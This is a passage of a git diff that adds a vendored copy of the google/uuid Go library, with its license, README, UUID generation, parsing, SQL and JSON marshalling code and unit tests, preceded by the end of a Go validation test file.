+	err = Validate("abc", &validateAbc{}, &validateXyz{})
+	if assert.NotNil(t, err) {
+		assert.Equal(t, "error xyz", err.Error())
+	}
+	err = Validate("abcxyz", &validateAbc{}, &validateXyz{})
+	assert.Nil(t, err)
+
+	err = Validate("123", &validateAbc{}, Skip, &validateXyz{})
+	if assert.NotNil(t, err) {
+		assert.Equal(t, "error abc", err.Error())
+	}
+	err = Validate("abc", &validateAbc{}, Skip, &validateXyz{})
+	assert.Nil(t, err)
+}
+
+func TestBy(t *testing.T) {
+	abcRule := By(func(value interface{}) error {
+		s, _ := value.(string)
+		if s != "abc" {
+			return errors.New("must be abc")
+		}
+		return nil
+	})
+	assert.Nil(t, Validate("abc", abcRule))
+	err := Validate("xyz", abcRule)
+	if assert.NotNil(t, err) {
+		assert.Equal(t, "must be abc", err.Error())
+	}
+}
+
+func Test_skipRule_Validate(t *testing.T) {
+	assert.Nil(t, Skip.Validate(100))
+}
+
+func assertError(t *testing.T, expected string, err error, tag string) {
+	if expected == "" {
+		assert.Nil(t, err, tag)
+	} else if assert.NotNil(t, err, tag) {
+		assert.Equal(t, expected, err.Error(), tag)
+	}
+}
+
+type validateAbc struct{}
+
+func (v *validateAbc) Validate(obj interface{}) error {
+	if !strings.Contains(obj.(string), "abc") {
+		return errors.New("error abc")
+	}
+	return nil
+}
+
+type validateXyz struct{}
+
+func (v *validateXyz) Validate(obj interface{}) error {
+	if !strings.Contains(obj.(string), "xyz") {
+		return errors.New("error xyz")
+	}
+	return nil
+}
+
+type validateInternalError struct{}
+
+func (v *validateInternalError) Validate(obj interface{}) error {
+	if strings.Contains(obj.(string), "internal") {
+		return NewInternalError(errors.New("error internal"))
+	}
+	return nil
+}
+
+type Model1 struct {
+	A string
+	B string
+	c string
+	D *string
+	E String123
+	F *String123
+	G string `json:"g"`
+}
+
+type String123 string
+
+func (s String123) Validate() error {
+	if !strings.Contains(string(s), "123") {
+		return errors.New("error 123")
+	}
+	return nil
+}
+
+type Model2 struct {
+	Model3
+	M3 Model3
+	B  string
+}
+
+type Model3 struct {
+	A string
+}
+
+func (m Model3) Validate() error {
+	return ValidateStruct(&m,
+		Field(&m.A, &validateAbc{}),
+	)
+}
diff --git a/vendor/github.com/google/uuid/.travis.yml b/vendor/github.com/google/uuid/.travis.yml
new file mode 100644
index 0000000000..d8156a60ba
--- /dev/null
+++ b/vendor/github.com/google/uuid/.travis.yml
@@ -0,0 +1,9 @@
+language: go
+
+go:
+  - 1.4.3
+  - 1.5.3
+  - tip
+
+script:
+  - go test -v ./...
diff --git a/vendor/github.com/google/uuid/CONTRIBUTING.md b/vendor/github.com/google/uuid/CONTRIBUTING.md
new file mode 100644
index 0000000000..04fdf09f13
--- /dev/null
+++ b/vendor/github.com/google/uuid/CONTRIBUTING.md
@@ -0,0 +1,10 @@
+# How to contribute
+
+We definitely welcome patches and contribution to this project!
+
+### Legal requirements
+
+In order to protect both you and ourselves, you will need to sign the
+[Contributor License Agreement](https://cla.developers.google.com/clas).
+
+You may have already signed it for other Google projects.
diff --git a/vendor/github.com/google/uuid/CONTRIBUTORS b/vendor/github.com/google/uuid/CONTRIBUTORS
new file mode 100644
index 0000000000..b4bb97f6bc
--- /dev/null
+++ b/vendor/github.com/google/uuid/CONTRIBUTORS
@@ -0,0 +1,9 @@
+Paul Borman <borman@google.com>
+bmatsuo
+shawnps
+theory
+jboverfelt
+dsymonds
+cd1
+wallclockbuilder
+dansouza
diff --git a/vendor/github.com/google/uuid/LICENSE b/vendor/github.com/google/uuid/LICENSE
new file mode 100644
index 0000000000..5dc68268d9
--- /dev/null
+++ b/vendor/github.com/google/uuid/LICENSE
@@ -0,0 +1,27 @@
+Copyright (c) 2009,2014 Google Inc. All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are
+met:
+
+   * Redistributions of source code must retain the above copyright
+notice, this list of conditions and the following disclaimer.
+   * Redistributions in binary form must reproduce the above
+copyright notice, this list of conditions and the following disclaimer
+in the documentation and/or other materials provided with the
+distribution.
+   * Neither the name of Google Inc. nor the names of its
+contributors may be used to endorse or promote products derived from
+this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
+LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
+DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
+THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
diff --git a/vendor/github.com/google/uuid/README.md b/vendor/github.com/google/uuid/README.md
new file mode 100644
index 0000000000..21205eaeb5
--- /dev/null
+++ b/vendor/github.com/google/uuid/README.md
@@ -0,0 +1,23 @@
+**This package is currently in development and the API may not be stable.**
+
+The API will become stable with v1.
+
+# uuid ![build status](https://travis-ci.org/google/uuid.svg?branch=master)
+The uuid package generates and inspects UUIDs based on
+[RFC 4122](http://tools.ietf.org/html/rfc4122)
+and DCE 1.1: Authentication and Security Services. 
+
+This package is based on the github.com/pborman/uuid package (previously named
+code.google.com/p/go-uuid).  It differs from these earlier packages in that
+a UUID is a 16 byte array rather than a byte slice.  One loss due to this
+change is the ability to represent an invalid UUID (vs a NIL UUID).
+
+###### Install
+`go get github.com/google/uuid`
+
+###### Documentation 
+[![GoDoc](https://godoc.org/github.com/google/uuid?status.svg)](http://godoc.org/github.com/google/uuid)
+
+Full `go doc` style documentation for the package can be viewed online without
+installing this package by using the GoDoc site here: 
+http://godoc.org/github.com/google/uuid
diff --git a/vendor/github.com/google/uuid/dce.go b/vendor/github.com/google/uuid/dce.go
new file mode 100644
index 0000000000..a6479dbae0
--- /dev/null
+++ b/vendor/github.com/google/uuid/dce.go
@@ -0,0 +1,80 @@
+// Copyright 2016 Google Inc.  All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+package uuid
+
+import (
+	"encoding/binary"
+	"fmt"
+	"os"
+)
+
+// A Domain represents a Version 2 domain
+type Domain byte
+
+// Domain constants for DCE Security (Version 2) UUIDs.
+const (
+	Person = Domain(0)
+	Group  = Domain(1)
+	Org    = Domain(2)
+)
+
+// NewDCESecurity returns a DCE Security (Version 2) UUID.
+//
+// The domain should be one of Person, Group or Org.
+// On a POSIX system the id should be the users UID for the Person
+// domain and the users GID for the Group.  The meaning of id for
+// the domain Org or on non-POSIX systems is site defined.
+//
+// For a given domain/id pair the same token may be returned for up to
+// 7 minutes and 10 seconds.
+func NewDCESecurity(domain Domain, id uint32) (UUID, error) {
+	uuid, err := NewUUID()
+	if err == nil {
+		uuid[6] = (uuid[6] & 0x0f) | 0x20 // Version 2
+		uuid[9] = byte(domain)
+		binary.BigEndian.PutUint32(uuid[0:], id)
+	}
+	return uuid, err
+}
+
+// NewDCEPerson returns a DCE Security (Version 2) UUID in the person
+// domain with the id returned by os.Getuid.
+//
+//  NewDCEPerson(Person, uint32(os.Getuid()))
+func NewDCEPerson() (UUID, error) {
+	return NewDCESecurity(Person, uint32(os.Getuid()))
+}
+
+// NewDCEGroup returns a DCE Security (Version 2) UUID in the group
+// domain with the id returned by os.Getgid.
+//
+//  NewDCEGroup(Group, uint32(os.Getgid()))
+func NewDCEGroup() (UUID, error) {
+	return NewDCESecurity(Group, uint32(os.Getgid()))
+}
+
+// Domain returns the domain for a Version 2 UUID.  Domains are only defined
+// for Version 2 UUIDs.
+func (uuid UUID) Domain() Domain {
+	return Domain(uuid[9])
+}
+
+// ID returns the id for a Version 2 UUID. IDs are only defined for Version 2
+// UUIDs.
+func (uuid UUID) ID() uint32 {
+	return binary.BigEndian.Uint32(uuid[0:4])
+}
+
+func (d Domain) String() string {
+	switch d {
+	case Person:
+		return "Person"
+	case Group:
+		return "Group"
+	case Org:
+		return "Org"
+	}
+	return fmt.Sprintf("Domain%d", int(d))
+}
diff --git a/vendor/github.com/google/uuid/doc.go b/vendor/github.com/google/uuid/doc.go
new file mode 100644
index 0000000000..5b8a4b9af8
--- /dev/null
+++ b/vendor/github.com/google/uuid/doc.go
@@ -0,0 +1,12 @@
+// Copyright 2016 Google Inc.  All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+// Package uuid generates and inspects UUIDs.
+//
+// UUIDs are based on RFC 4122 and DCE 1.1: Authentication and Security
+// Services.
+//
+// A UUID is a 16 byte (128 bit) array.  UUIDs may be used as keys to
+// maps or compared directly.
+package uuid
diff --git a/vendor/github.com/google/uuid/hash.go b/vendor/github.com/google/uuid/hash.go
new file mode 100644
index 0000000000..4fc5a77df5
--- /dev/null
+++ b/vendor/github.com/google/uuid/hash.go
@@ -0,0 +1,53 @@
+// Copyright 2016 Google Inc.  All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+package uuid
+
+import (
+	"crypto/md5"
+	"crypto/sha1"
+	"hash"
+)
+
+// Well known namespace IDs and UUIDs
+var (
+	NameSpaceDNS  = Must(Parse("6ba7b810-9dad-11d1-80b4-00c04fd430c8"))
+	NameSpaceURL  = Must(Parse("6ba7b811-9dad-11d1-80b4-00c04fd430c8"))
+	NameSpaceOID  = Must(Parse("6ba7b812-9dad-11d1-80b4-00c04fd430c8"))
+	NameSpaceX500 = Must(Parse("6ba7b814-9dad-11d1-80b4-00c04fd430c8"))
+	Nil           UUID // empty UUID, all zeros
+)
+
+// NewHash returns a new UUID derived from the hash of space concatenated with
+// data generated by h.  The hash should be at least 16 byte in length.  The
+// first 16 bytes of the hash are used to form the UUID.  The version of the
+// UUID will be the lower 4 bits of version.  NewHash is used to implement
+// NewMD5 and NewSHA1.
+func NewHash(h hash.Hash, space UUID, data []byte, version int) UUID {
+	h.Reset()
+	h.Write(space[:])
+	h.Write([]byte(data))
+	s := h.Sum(nil)
+	var uuid UUID
+	copy(uuid[:], s)
+	uuid[6] = (uuid[6] & 0x0f) | uint8((version&0xf)<<4)
+	uuid[8] = (uuid[8] & 0x3f) | 0x80 // RFC 4122 variant
+	return uuid
+}
+
+// NewMD5 returns a new MD5 (Version 3) UUID based on the
+// supplied name space and data.  It is the same as calling:
+//
+//  NewHash(md5.New(), space, data, 3)
+func NewMD5(space UUID, data []byte) UUID {
+	return NewHash(md5.New(), space, data, 3)
+}
+
+// NewSHA1 returns a new SHA1 (Version 5) UUID based on the
+// supplied name space and data.  It is the same as calling:
+//
+//  NewHash(sha1.New(), space, data, 5)
+func NewSHA1(space UUID, data []byte) UUID {
+	return NewHash(sha1.New(), space, data, 5)
+}
diff --git a/vendor/github.com/google/uuid/json_test.go b/vendor/github.com/google/uuid/json_test.go
new file mode 100644
index 0000000000..245f91edfb
--- /dev/null
+++ b/vendor/github.com/google/uuid/json_test.go
@@ -0,0 +1,62 @@
+// Copyright 2016 Google Inc.  All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+package uuid
+
+import (
+	"encoding/json"
+	"reflect"
+	"testing"
+)
+
+var testUUID = Must(Parse("f47ac10b-58cc-0372-8567-0e02b2c3d479"))
+
+func TestJSON(t *testing.T) {
+	type S struct {
+		ID1 UUID
+		ID2 UUID
+	}
+	s1 := S{ID1: testUUID}
+	data, err := json.Marshal(&s1)
+	if err != nil {
+		t.Fatal(err)
+	}
+	var s2 S
+	if err := json.Unmarshal(data, &s2); err != nil {
+		t.Fatal(err)
+	}
+	if !reflect.DeepEqual(&s1, &s2) {
+		t.Errorf("got %#v, want %#v", s2, s1)
+	}
+}
+
+func BenchmarkUUID_MarshalJSON(b *testing.B) {
+	x := &struct {
+		UUID UUID `json:"uuid"`
+	}{}
+	var err error
+	x.UUID, err = Parse("f47ac10b-58cc-0372-8567-0e02b2c3d479")
+	if err != nil {
+		b.Fatal(err)
+	}
+	for i := 0; i < b.N; i++ {
+		js, err := json.Marshal(x)
+		if err != nil {
+			b.Fatalf("marshal json: %#v (%v)", js, err)
+		}
+	}
+}
+
+func BenchmarkUUID_UnmarshalJSON(b *testing.B) {
+	js := []byte(`{"uuid":"f47ac10b-58cc-0372-8567-0e02b2c3d479"}`)
+	var x *struct {
+		UUID UUID `json:"uuid"`
+	}
+	for i := 0; i < b.N; i++ {
+		err := json.Unmarshal(js, &x)
+		if err != nil {
+			b.Fatalf("marshal json: %#v (%v)", js, err)
+		}
+	}
+}
diff --git a/vendor/github.com/google/uuid/marshal.go b/vendor/github.com/google/uuid/marshal.go
new file mode 100644
index 0000000000..84bbc5880b
--- /dev/null
+++ b/vendor/github.com/google/uuid/marshal.go
@@ -0,0 +1,39 @@
+// Copyright 2016 Google Inc.  All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+package uuid
+
+import "fmt"
+
+// MarshalText implements encoding.TextMarshaler.
+func (uuid UUID) MarshalText() ([]byte, error) {
+	var js [36]byte
+	encodeHex(js[:], uuid)
+	return js[:], nil
+}
+
+// UnmarshalText implements encoding.TextUnmarshaler.
+func (uuid *UUID) UnmarshalText(data []byte) error {
+	// See comment in ParseBytes why we do this.
+	// id, err := ParseBytes(data)
+	id, err := ParseBytes(data)
+	if err == nil {
+		*uuid = id
+	}
+	return err
+}
+
+// MarshalBinary implements encoding.BinaryMarshaler.
+func (uuid UUID) MarshalBinary() ([]byte, error) {
+	return uuid[:], nil
+}
+
+// UnmarshalBinary implements encoding.BinaryUnmarshaler.
+func (uuid *UUID) UnmarshalBinary(data []byte) error {
+	if len(data) != 16 {
+		return fmt.Errorf("invalid UUID (got %d bytes)", len(data))
+	}
+	copy(uuid[:], data)
+	return nil
+}
diff --git a/vendor/github.com/google/uuid/node.go b/vendor/github.com/google/uuid/node.go
new file mode 100644
index 0000000000..5f0156a2e6
--- /dev/null
+++ b/vendor/github.com/google/uuid/node.go
@@ -0,0 +1,103 @@
+// Copyright 2016 Google Inc.  All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+package uuid
+
+import (
+	"net"
+	"sync"
+)
+
+var (
+	nodeMu     sync.Mutex
+	interfaces []net.Interface // cached list of interfaces
+	ifname     string          // name of interface being used
+	nodeID     [6]byte         // hardware for version 1 UUIDs
+	zeroID     [6]byte         // nodeID with only 0's
+)
+
+// NodeInterface returns the name of the interface from which the NodeID was
+// derived.  The interface "user" is returned if the NodeID was set by
+// SetNodeID.
+func NodeInterface() string {
+	defer nodeMu.Unlock()
+	nodeMu.Lock()
+	return ifname
+}
+
+// SetNodeInterface selects the hardware address to be used for Version 1 UUIDs.
+// If name is "" then the first usable interface found will be used or a random
+// Node ID will be generated.  If a named interface cannot be found then false
+// is returned.
+//
+// SetNodeInterface never fails when name is "".
+func SetNodeInterface(name string) bool {
+	defer nodeMu.Unlock()
+	nodeMu.Lock()
+	return setNodeInterface(name)
+}
+
+func setNodeInterface(name string) bool {
+	if interfaces == nil {
+		var err error
+		interfaces, err = net.Interfaces()
+		if err != nil && name != "" {
+			return false
+		}
+	}
+
+	for _, ifs := range interfaces {
+		if len(ifs.HardwareAddr) >= 6 && (name == "" || name == ifs.Name) {
+			copy(nodeID[:], ifs.HardwareAddr)
+			ifname = ifs.Name
+			return true
+		}
+	}
+
+	// We found no interfaces with a valid hardware address.  If name
+	// does not specify a specific interface generate a random Node ID
+	// (section 4.1.6)
+	if name == "" {
+		randomBits(nodeID[:])
+		return true
+	}
+	return false
+}
+
+// NodeID returns a slice of a copy of the current Node ID, setting the Node ID
+// if not already set.
+func NodeID() []byte {
+	defer nodeMu.Unlock()
+	nodeMu.Lock()
+	if nodeID == zeroID {
+		setNodeInterface("")
+	}
+	nid := nodeID
+	return nid[:]
+}
+
+// SetNodeID sets the Node ID to be used for Version 1 UUIDs.  The first 6 bytes
+// of id are used.  If id is less than 6 bytes then false is returned and the
+// Node ID is not set.
+func SetNodeID(id []byte) bool {
+	if len(id) < 6 {
+		return false
+	}
+	defer nodeMu.Unlock()
+	nodeMu.Lock()
+	copy(nodeID[:], id)
+	ifname = "user"
+	return true
+}
+
+// NodeID returns the 6 byte node id encoded in uuid.  It returns nil if uuid is
+// not valid.  The NodeID is only well defined for version 1 and 2 UUIDs.
+func (uuid UUID) NodeID() []byte {
+	if len(uuid) != 16 {
+		return nil
+	}
+	var node [6]byte
+	copy(node[:], uuid[10:])
+	return node[:]
+}
diff --git a/vendor/github.com/google/uuid/seq_test.go b/vendor/github.com/google/uuid/seq_test.go
new file mode 100644
index 0000000000..853a4aa3f3
--- /dev/null
+++ b/vendor/github.com/google/uuid/seq_test.go
@@ -0,0 +1,66 @@
+// Copyright 2016 Google Inc.  All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+package uuid
+
+import (
+	"flag"
+	"runtime"
+	"testing"
+	"time"
+)
+
+// This test is only run when --regressions is passed on the go test line.
+var regressions = flag.Bool("regressions", false, "run uuid regression tests")
+
+// TestClockSeqRace tests for a particular race condition of returning two
+// identical Version1 UUIDs.  The duration of 1 minute was chosen as the race
+// condition, before being fixed, nearly always occured in under 30 seconds.
+func TestClockSeqRace(t *testing.T) {
+	if !*regressions {
+		t.Skip("skipping regression tests")
+	}
+	duration := time.Minute
+
+	done := make(chan struct{})
+	defer close(done)
+
+	ch := make(chan UUID, 10000)
+	ncpu := runtime.NumCPU()
+	switch ncpu {
+	case 0, 1:
+		// We can't run the test effectively.
+		t.Skip("skipping race test, only one CPU detected")
+		return
+	default:
+		runtime.GOMAXPROCS(ncpu)
+	}
+	for i := 0; i < ncpu; i++ {
+		go func() {
+			for {
+				select {
+				case <-done:
+					return
+				case ch <- Must(NewUUID()):
+				}
+			}
+		}()
+	}
+
+	uuids := make(map[string]bool)
+	cnt := 0
+	start := time.Now()
+	for u := range ch {
+		s := u.String()
+		if uuids[s] {
+			t.Errorf("duplicate uuid after %d in %v: %s", cnt, time.Since(start), s)
+			return
+		}
+		uuids[s] = true
+		if time.Since(start) > duration {
+			return
+		}
+		cnt++
+	}
+}
diff --git a/vendor/github.com/google/uuid/sql.go b/vendor/github.com/google/uuid/sql.go
new file mode 100644
index 0000000000..528ad0de51
--- /dev/null
+++ b/vendor/github.com/google/uuid/sql.go
@@ -0,0 +1,58 @@
+// Copyright 2016 Google Inc.  All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+package uuid
+
+import (
+	"database/sql/driver"
+	"fmt"
+)
+
+// Scan implements sql.Scanner so UUIDs can be read from databases transparently
+// Currently, database types that map to string and []byte are supported. Please
+// consult database-specific driver documentation for matching types.
+func (uuid *UUID) Scan(src interface{}) error {
+	switch src.(type) {
+	case string:
+		// if an empty UUID comes from a table, we return a null UUID
+		if src.(string) == "" {
+			return nil
+		}
+
+		// see Parse for required string format
+		u, err := Parse(src.(string))
+
+		if err != nil {
+			return fmt.Errorf("Scan: %v", err)
+		}
+
+		*uuid = u
+	case []byte:
+		b := src.([]byte)
+
+		// if an empty UUID comes from a table, we return a null UUID
+		if len(b) == 0 {
+			return nil
+		}
+
+		// assumes a simple slice of bytes if 16 bytes
+		// otherwise attempts to parse
+		if len(b) != 16 {
+			return uuid.Scan(string(b))
+		}
+		copy((*uuid)[:], b)
+
+	default:
+		return fmt.Errorf("Scan: unable to scan type %T into UUID", src)
+	}
+
+	return nil
+}
+
+// Value implements sql.Valuer so that UUIDs can be written to databases
+// transparently. Currently, UUIDs map to strings. Please consult
+// database-specific driver documentation for matching types.
+func (uuid UUID) Value() (driver.Value, error) {
+	return uuid.String(), nil
+}
diff --git a/vendor/github.com/google/uuid/sql_test.go b/vendor/github.com/google/uuid/sql_test.go
new file mode 100644
index 0000000000..c193196037
--- /dev/null
+++ b/vendor/github.com/google/uuid/sql_test.go
@@ -0,0 +1,102 @@
+// Copyright 2016 Google Inc.  All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+package uuid
+
+import (
+	"strings"
+	"testing"
+)
+
+func TestScan(t *testing.T) {
+	var stringTest string = "f47ac10b-58cc-0372-8567-0e02b2c3d479"
+	var badTypeTest int = 6
+	var invalidTest string = "f47ac10b-58cc-0372-8567-0e02b2c3d4"
+
+	byteTest := make([]byte, 16)
+	byteTestUUID := Must(Parse(stringTest))
+	copy(byteTest, byteTestUUID[:])
+
+	// sunny day tests
+
+	var uuid UUID
+	err := (&uuid).Scan(stringTest)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	err = (&uuid).Scan([]byte(stringTest))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	err = (&uuid).Scan(byteTest)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// bad type tests
+
+	err = (&uuid).Scan(badTypeTest)
+	if err == nil {
+		t.Error("int correctly parsed and shouldn't have")
+	}
+	if !strings.Contains(err.Error(), "unable to scan type") {
+		t.Error("attempting to parse an int returned an incorrect error message")
+	}
+
+	// invalid/incomplete uuids
+
+	err = (&uuid).Scan(invalidTest)
+	if err == nil {
+		t.Error("invalid uuid was parsed without error")
+	}
+	if !strings.Contains(err.Error(), "invalid UUID") {
+		t.Error("attempting to parse an invalid UUID returned an incorrect error message")
+	}
+
+	err = (&uuid).Scan(byteTest[:len(byteTest)-2])
+	if err == nil {
+		t.Error("invalid byte uuid was parsed without error")
+	}
+	if !strings.Contains(err.Error(), "invalid UUID") {
+		t.Error("attempting to parse an invalid byte UUID returned an incorrect error message")
+	}
+
+	// empty tests
+
+	uuid = UUID{}
+	var emptySlice []byte
+	err = (&uuid).Scan(emptySlice)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	for _, v := range uuid {
+		if v != 0 {
+			t.Error("UUID was not nil after scanning empty byte slice")
+		}
+	}
+
+	uuid = UUID{}
+	var emptyString string
+	err = (&uuid).Scan(emptyString)
+	if err != nil {
+		t.Fatal(err)
+	}
+	for _, v := range uuid {
+		if v != 0 {
+			t.Error("UUID was not nil after scanning empty byte slice")
+		}
+	}
+}
+
+func TestValue(t *testing.T) {
+	stringTest := "f47ac10b-58cc-0372-8567-0e02b2c3d479"
+	uuid := Must(Parse(stringTest))
+	val, _ := uuid.Value()
+	if val != stringTest {
+		t.Error("Value() did not return expected string")
+	}
+}
diff --git a/vendor/github.com/google/uuid/time.go b/vendor/github.com/google/uuid/time.go
new file mode 100644
index 0000000000..fd7fe0ac46
--- /dev/null
+++ b/vendor/github.com/google/uuid/time.go
@@ -0,0 +1,123 @@
+// Copyright 2016 Google Inc.  All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+package uuid
+
+import (
+	"encoding/binary"
+	"sync"
+	"time"
+)
+
+// A Time represents a time as the number of 100's of nanoseconds since 15 Oct
+// 1582.
+type Time int64
+
+const (
+	lillian    = 2299160          // Julian day of 15 Oct 1582
+	unix       = 2440587          // Julian day of 1 Jan 1970
+	epoch      = unix - lillian   // Days between epochs
+	g1582      = epoch * 86400    // seconds between epochs
+	g1582ns100 = g1582 * 10000000 // 100s of a nanoseconds between epochs
+)
+
+var (
+	timeMu   sync.Mutex
+	lasttime uint64 // last time we returned
+	clockSeq uint16 // clock sequence for this run
+
+	timeNow = time.Now // for testing
+)
+
+// UnixTime converts t the number of seconds and nanoseconds using the Unix
+// epoch of 1 Jan 1970.
+func (t Time) UnixTime() (sec, nsec int64) {
+	sec = int64(t - g1582ns100)
+	nsec = (sec % 10000000) * 100
+	sec /= 10000000
+	return sec, nsec
+}
+
+// GetTime returns the current Time (100s of nanoseconds since 15 Oct 1582) and
+// clock sequence as well as adjusting the clock sequence as needed.  An error
+// is returned if the current time cannot be determined.
+func GetTime() (Time, uint16, error) {
+	defer timeMu.Unlock()
+	timeMu.Lock()
+	return getTime()
+}
+
+func getTime() (Time, uint16, error) {
+	t := timeNow()
+
+	// If we don't have a clock sequence already, set one.
+	if clockSeq == 0 {
+		setClockSequence(-1)
+	}
+	now := uint64(t.UnixNano()/100) + g1582ns100
+
+	// If time has gone backwards with this clock sequence then we
+	// increment the clock sequence
+	if now <= lasttime {
+		clockSeq = ((clockSeq + 1) & 0x3fff) | 0x8000
+	}
+	lasttime = now
+	return Time(now), clockSeq, nil
+}
+
+// ClockSequence returns the current clock sequence, generating one if not
+// already set.  The clock sequence is only used for Version 1 UUIDs.
+//
+// The uuid package does not use global static storage for the clock sequence or
+// the last time a UUID was generated.  Unless SetClockSequence is used, a new
+// random clock sequence is generated the first time a clock sequence is
+// requested by ClockSequence, GetTime, or NewUUID.  (section 4.2.1.1)
+func ClockSequence() int {
+	defer timeMu.Unlock()
+	timeMu.Lock()
+	return clockSequence()
+}
+
+func clockSequence() int {
+	if clockSeq == 0 {
+		setClockSequence(-1)
+	}
+	return int(clockSeq & 0x3fff)
+}
+
+// SetClockSeq sets the clock sequence to the lower 14 bits of seq.  Setting to
+// -1 causes a new sequence to be generated.
+func SetClockSequence(seq int) {
+	defer timeMu.Unlock()
+	timeMu.Lock()
+	setClockSequence(seq)
+}
+
+func setClockSequence(seq int) {
+	if seq == -1 {
+		var b [2]byte
+		randomBits(b[:]) // clock sequence
+		seq = int(b[0])<<8 | int(b[1])
+	}
+	old_seq := clockSeq
+	clockSeq = uint16(seq&0x3fff) | 0x8000 // Set our variant
+	if old_seq != clockSeq {
+		lasttime = 0
+	}
+}
+
+// Time returns the time in 100s of nanoseconds since 15 Oct 1582 encoded in
+// uuid.  The time is only defined for version 1 and 2 UUIDs.
+func (uuid UUID) Time() Time {
+	time := int64(binary.BigEndian.Uint32(uuid[0:4]))
+	time |= int64(binary.BigEndian.Uint16(uuid[4:6])) << 32
+	time |= int64(binary.BigEndian.Uint16(uuid[6:8])&0xfff) << 48
+	return Time(time)
+}
+
+// ClockSequence returns the clock sequence encoded in uuid.
+// The clock sequence is only well defined for version 1 and 2 UUIDs.
+func (uuid UUID) ClockSequence() int {
+	return int(binary.BigEndian.Uint16(uuid[8:10])) & 0x3fff
+}
diff --git a/vendor/github.com/google/uuid/util.go b/vendor/github.com/google/uuid/util.go
new file mode 100644
index 0000000000..5ea6c73780
--- /dev/null
+++ b/vendor/github.com/google/uuid/util.go
@@ -0,0 +1,43 @@
+// Copyright 2016 Google Inc.  All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+package uuid
+
+import (
+	"io"
+)
+
+// randomBits completely fills slice b with random data.
+func randomBits(b []byte) {
+	if _, err := io.ReadFull(rander, b); err != nil {
+		panic(err.Error()) // rand should never fail
+	}
+}
+
+// xvalues returns the value of a byte as a hexadecimal digit or 255.
+var xvalues = [256]byte{
+	255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
+	255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
+	255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
+	0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 255, 255, 255, 255, 255, 255,
+	255, 10, 11, 12, 13, 14, 15, 255, 255, 255, 255, 255, 255, 255, 255, 255,
+	255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
+	255, 10, 11, 12, 13, 14, 15, 255, 255, 255, 255, 255, 255, 255, 255, 255,
+	255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
+	255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
+	255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
+	255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
+	255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
+	255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
+	255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
+	255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
+	255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
+}
+
+// xtob converts hex characters x1 and x2 into a byte.
+func xtob(x1, x2 byte) (byte, bool) {
+	b1 := xvalues[x1]
+	b2 := xvalues[x2]
+	return (b1 << 4) | b2, b1 != 255 && b2 != 255
+}
diff --git a/vendor/github.com/google/uuid/uuid.go b/vendor/github.com/google/uuid/uuid.go
new file mode 100644
index 0000000000..b7b9ced315
--- /dev/null
+++ b/vendor/github.com/google/uuid/uuid.go
@@ -0,0 +1,191 @@
+// Copyright 2016 Google Inc.  All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+package uuid
+
+import (
+	"bytes"
+	"crypto/rand"
+	"encoding/hex"
+	"errors"
+	"fmt"
+	"io"
+	"strings"
+)
+
+// A UUID is a 128 bit (16 byte) Universal Unique IDentifier as defined in RFC
+// 4122.
+type UUID [16]byte
+
+// A Version represents a UUID's version.
+type Version byte
+
+// A Variant represents a UUID's variant.
+type Variant byte
+
